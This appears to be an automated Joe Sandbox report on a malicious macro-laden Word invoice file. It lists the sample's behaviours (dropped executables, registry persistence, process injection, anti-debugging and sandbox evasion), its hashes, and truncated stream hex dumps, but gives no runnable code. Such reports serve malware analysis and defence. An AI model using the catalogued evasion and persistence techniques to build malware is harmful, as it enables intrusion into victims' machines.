Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 17.0.0 |
Analysis ID: | 14 |
Start time: | 15:28:20 |
Joe Sandbox Product: | Desktop |
Start date: | 08.12.2016 |
Overall analysis duration: | 0h 7m 42s |
Report type: | full |
Sample file name: | bill_0803708258.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | W7 32bit with Office 2010 |
Number of analysed new started processes analysed: | 10 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies |
|
Detection: | MAL |
Classification: | mal100.evad.expl.winDOC@11/8@0/0 |
Cookbook Comments: |
|
Warnings: | Show All
|
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 100 | 0 - 100 | Report FP / FN |
Classification |
---|
Analysis Advice |
---|
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox |
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook |
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
Signature Overview |
---|
Click to jump to signature section
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: |
Document exploit detected (creates forbidden files) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Document exploit detected (drops PE files) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Networking: |
---|
Downloads files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Boot Survival: |
---|
Creates an autostart registry key | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Registry value created or modified: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Registry value created or modified: |
Creates an autostart registry key pointing to binary in C:\Windows | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Registry value created or modified: |
Persistence and Installation Behavior: |
---|
Drops PE files | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | File created: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Drops PE files to the windows directory (C:\Windows) | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | File created: |
Drops executables to the windows directory (C:\Windows) and starts them | Show sources |
Source: C:\Windows\System32\WinHost32.exe | Executable created and started: |
Data Obfuscation: |
---|
Entry point lies outside standard sections | Show sources |
Source: initial sample | Static PE information: |
PE file contains sections with non-standard names | Show sources |
Source: re717.exe.3848.dr | Static PE information: | ||
Source: WinHost32.exe.3048.dr | Static PE information: |
System Summary: |
---|
Tries to open an application configuration file (.cfg) | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | File opened: |
Checks whether correct version of .NET is installed | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Executable creates window controls seldom found in malware | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: |
Found graphical window changes (likely an installer) | Show sources |
Source: Window Recorder | Window detected: |
Checks if Microsoft Office is installed | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: |
Document has a 'bytes' value indicative for goodware | Show sources |
Source: bill_0803708258.doc | Initial sample: |
Classification label | Show sources |
Source: classification engine | Classification label: |
Creates files inside the user directory | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Creates temporary files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: |
Document contains an OLE Word Document stream indicating a Microsoft Word file | Show sources |
Source: bill_0803708258.doc | OLE indicator, Word Document stream: |
Reads ini files | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: |
Reads software policies | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: |
Spawns processes | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process created: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process created: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process created: | ||
Source: C:\Windows\System32\WinHost32.exe | Process created: |
Uses an in-process (OLE) Automation server | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Creates files inside the system directory | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | File created: |
Document contains embedded VBA macros | Show sources |
Source: bill_0803708258.doc | OLE indicator, VBA macros: |
Document contains summary information with irregular field values | Show sources |
Source: bill_0803708258.doc | OLE document summary: |
PE file contains executable resources (Code or Archives) | Show sources |
Source: re717.exe.3848.dr | Static PE information: | ||
Source: WinHost32.exe.3048.dr | Static PE information: |
Reads the hosts file | Show sources |
Source: C:\Windows\System32\WinHost32.exe | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed | Show sources |
Source: bill_0803708258.doc | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: Document_Open |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: bill_0803708258.doc | OLE, VBA macro line: |
Document contains an embedded VBA macro which may execute shellcode | Show sources |
Document contains an embedded VBA macro with suspicious strings | Show sources |
Document contains an embedded VBA with base64 encoded strings | Show sources |
Source: VBA code instrumentation | OLE, VBA macro: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Injects a PE file into a foreign processes | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Memory written: | ||
Source: C:\Windows\System32\WinHost32.exe | Memory written: |
Modifies the context of a thread in another process (thread injection) | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Thread register set: |
Sets debug register (to hijack the execution of another thread) | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Thread register set: |
Anti Debugging: |
---|
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) | Show sources |
Source: C:\Windows\System32\WinHost32.exe | System information queried: |
Malware Analysis System Evasion: |
---|
Queries a list of all running processes | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process information queried: |
Found a high number of Window / User specific system calls (may be a loop to detect user behavior) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window / User API: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window / User API: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Window / User API: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Window / User API: | ||
Source: C:\Windows\System32\WinHost32.exe | Window / User API: | ||
Source: C:\Windows\System32\WinHost32.exe | Window / User API: |
Found dropped PE file which has not been started or loaded | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Dropped PE file which has not been started: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Dropped PE file which has not been started: |
Is looking for software installed on the system | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Registry key enumerated: |
May sleep (evasive loops) to hinder dynamic analysis | Show sources |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe TID: 3040 | Thread sleep count: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe TID: 3040 | Thread sleep count: | ||
Source: C:\Windows\System32\WinHost32.exe TID: 2468 | Thread sleep count: | ||
Source: C:\Windows\System32\WinHost32.exe TID: 2468 | Thread sleep count: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messsages (SetErrorMode) | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process information set: | ||
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe | Process information set: | ||
Source: C:\Windows\System32\cmd.exe | Process information set: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID | Show sources |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key value queried: |
Behavior Graph |
---|
Yara Overview |
---|
No Yara matches |
---|
Screenshot |
---|
Startup |
---|
|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
| |
| |
| |
| |
| |
| |
| |
|
Contacted Domains/Contacted IPs |
---|
Static File Info |
---|
General | |
---|---|
File type: | 0 |
TrID: |
|
File name: | bill_0803708258.doc |
File size: | 166400 |
MD5: | 3ebd49f7168ff668d617a174b1e7c30a |
SHA1: | 0dfeda64a48d26442660ed954c2aca8d1f1ba4e2 |
SHA256: | e1cfa6e63e13095e4060b18e11b091712fb8508b403eb0b1de271ee73e5e8008 |
SHA512: | c55bab4b42a07c307eb6ee585e62699cf89be6b4911153d571b6589f2a57f24da84b82f8dd9767176fe438fdce3688f434603506abec38374aa92a9043485b87 |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1252 |
Title: | |
Subject: | |
Author: | Helen |
Keywords: | |
Comments: | |
Template: | Normal.dot |
Last Saved By: | User |
Revion Number: | 13 |
Total Edit Time: | 120 |
Create Time: | 2016-09-26 13:32:00 |
Last Saved Time: | 2016-09-26 14:35:00 |
Number of Pages: | 1 |
Number of Words: | 0 |
Number of Characters: | 2 |
Creating Application: | Microsoft Office Word |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | -535 |
Number of Bytes: | 11000 |
Number of Lines: | 1 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 726502 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 8470 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 8470 |
Data ASCII: | . . . . . . . . . 6 . . . . . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 36 07 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 3e 07 00 00 a2 17 00 00 00 00 00 00 01 00 00 00 af d1 d3 1e 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
VBA File Name: andosite.bas, Stream Size: 16341 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/andosite |
VBA File Name: | andosite.bas |
Stream Size: | 16341 |
Data ASCII: | . . . . . , . . . . . . . . . . . . . . . . . . . . . . . . / . . . . . . . . . . . . n l . . . . . . . . . . . . . . . . . . < . . . . . . . . . s . . . o . . . . . . . . . R t l M o v e M e m o r y . . . . . . . 8 . . . . . . . . . . . . . . . S e l e c t O b j e c t . . . . . . . . \\ . . . $ . . . . . . . . . . . G e t P r i o r i t y C l a s s . . . . . . . . . . . . H . . . . . . . . . . . E n d D i a l o g . . . . . . . . . . . p . . . . . . . . . . . C r e a t e E v e n t A . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 2c 02 00 00 10 0d 00 00 10 02 00 00 c4 02 00 00 ff ff ff ff 17 0d 00 00 b3 2f 00 00 00 00 00 00 01 00 00 00 af d1 6e 6c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 3c 01 00 00 00 00 e8 02 14 00 73 00 ff ff 6f 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 f0 02 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 65 6c 65 63 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
VBA File Name: crappie.frm, Stream Size: 1158 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/crappie |
VBA File Name: | crappie.frm |
Stream Size: | 1158 |
Data ASCII: | . . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 af d1 f3 89 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 144 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 144 |
Entropy: | 3.91953852555 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q > . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . O . f . f . i . c . e . . W . o . r . d . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 3e 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 4f 00 66 00 66 00 69 00 63 00 65 00 20 00 57 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | FoxPro FPT, blocks size 512, next free block index 4278124544 |
Stream Size: | 4096 |
Entropy: | 0.303043979959 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 04 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 0f 00 00 00 78 00 00 00 04 00 00 00 84 00 00 00 05 00 00 00 8c 00 00 00 06 00 00 00 94 00 00 00 11 00 00 00 9c 00 00 00 17 00 00 00 a4 00 00 00 0b 00 00 00 ac 00 00 00 10 00 00 00 b4 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | FoxPro FPT, blocks size 512, next free block index 4278124544 |
Stream Size: | 4096 |
Entropy: | 0.458075214693 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H e l e n . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00 |
Stream Path: 1Table, File Type: FoxPro FPT, blocks size 256, next free block index 2248281856, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | 1Table |
File Type: | FoxPro FPT, blocks size 256, next free block index 2248281856 |
Stream Size: | 4096 |
Entropy: | 2.22928850159 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 86 02 0f 00 12 00 01 00 9c 00 0f 00 04 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: Data, File Type: data, Stream Size: 50523 |
---|
General | |
---|---|
Stream Path: | Data |
File Type: | data |
Stream Size: | 50523 |
Entropy: | 5.60731034209 |
Base64 Encoded: | True |
Data ASCII: | [ . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . C . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . p . i . c . . . . . . . . . . . . . . . b . . . . . . . . . i . D 8 . 2 s p . h S . . . ` N . . . . . . . . . . D . . . . . . . . n . . . . . . i . D 8 . 2 s p . h S . . . ` N . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . p H Y s . . |
Data Raw: | 5b c5 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0f 00 35 05 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 44 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 20 00 00 00 04 41 01 00 00 00 05 c1 08 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 70 00 69 00 |
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 528 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 528 |
Entropy: | 5.37335735734 |
Base64 Encoded: | True |
Data ASCII: | I D = " { C 6 8 C D A 7 A - 2 9 A 4 - 4 B B 3 - A 4 B B - 3 5 5 1 F E 6 2 6 9 1 A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a n d o s i t e . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = c r a p p i e . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 B 3 9 3 8 0 7 7 7 0 B 7 7 0 B 7 7 0 B |
Data Raw: | 49 44 3d 22 7b 43 36 38 43 44 41 37 41 2d 32 39 41 34 2d 34 42 42 33 2d 41 34 42 42 2d 33 35 35 31 46 45 36 32 36 39 31 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 61 6e 64 6f 73 69 74 65 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 |
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 92 |
---|
General | |
---|---|
Stream Path: | Macros/PROJECTwm |
File Type: | data |
Stream Size: | 92 |
Entropy: | 3.25790113519 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . a n d o s i t e . a . n . d . o . s . i . t . e . . . c r a p p i e . c . r . a . p . p . i . e . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 61 6e 64 6f 73 69 74 65 00 61 00 6e 00 64 00 6f 00 73 00 69 00 74 00 65 00 00 00 63 72 61 70 70 69 65 00 63 00 72 00 61 00 70 00 70 00 69 00 65 00 00 00 00 00 |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5887 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 5887 |
Entropy: | 5.20766383872 |
Base64 Encoded: | True |
Data ASCII: | . a y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . |
Data Raw: | cc 61 79 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00 |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 843 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 843 |
Entropy: | 6.49606511643 |
Base64 Encoded: | True |
Data ASCII: | . G . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . Y . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . < . Y . |
Data Raw: | 01 47 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 ff e2 b2 59 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Stream Path: Macros/crappie/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: Macros/crappie/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 312 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 312 |
Entropy: | 4.5489278468 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } c r a p p i e . . C a p t i o n = " h e u r e " . . C l i e n t H e i g h t = 4 5 1 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 7 5 . . C l i e n t W i d t h = 3 9 0 0 . . H e l p C o n t e x t I D = 4 4 . . S t a r t U p P o s i t |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 63 72 61 70 70 69 65 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 68 65 75 72 65 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 34 35 31 35 |
Stream Path: Macros/crappie/f, File Type: data, Stream Size: 9176 |
---|
General | |
---|---|
Stream Path: | Macros/crappie/f |
File Type: | data |
Stream Size: | 9176 |
Entropy: | 5.34937606033 |
Base64 Encoded: | True |
